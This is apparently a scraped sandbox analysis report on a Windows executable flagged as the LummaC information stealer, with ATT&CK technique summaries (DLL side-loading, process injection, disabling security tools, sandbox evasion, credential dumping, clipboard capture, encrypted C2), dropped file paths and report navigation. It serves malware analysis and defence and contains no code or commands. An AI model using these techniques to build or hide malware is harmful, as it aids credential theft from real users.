Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PASS-1234.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PASS-1234.exe_e021ab1d3b8f5f284669294561b364c83af9d6fb_861bfbec_73b98097-6c03-4186-9005-e2bd03b99b7e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECA6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF189.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1B9.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
PASS-1234.exe

Function 6D3863E0 Relevance: 15.0, APIs: 3, Strings: 5, Instructions: 992
nativeCOMMON

Function 6D38FE38 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6D38FEE8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6D38FD31 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6D394B5D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6D3953C0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 6D393126 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre